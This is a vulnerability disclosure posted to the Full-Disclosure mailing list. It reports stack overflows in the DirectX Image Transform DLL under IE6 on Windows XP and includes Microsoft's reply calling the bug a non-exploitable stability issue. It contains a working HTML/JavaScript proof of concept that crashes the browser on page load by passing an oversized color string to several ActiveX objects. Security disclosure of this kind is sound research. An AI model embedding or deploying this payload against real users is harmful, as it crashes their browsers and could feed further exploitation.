There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX Image Transform objects which are safe for scripting. The issue is with the Color property of certain objects, so I am assuming this property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version of the dxmsft.dll). I have not tested code execution, though it may be possible. I received the following response from Microsoft:

---
>From our investigation this issue was found to be a stability problem which is not exploitable. The net effect of this issue is that IE will become unresponsive. The underlying operating system will still respond and Killing the process will stop the local DoS.
---

It did not hang IE on my machine, but instead crashed IE with a stack overflow. 
This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

---------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";

     while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
     obj.color = s;
 
    var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
     obj.color = s;

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();" />
</html>
---------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/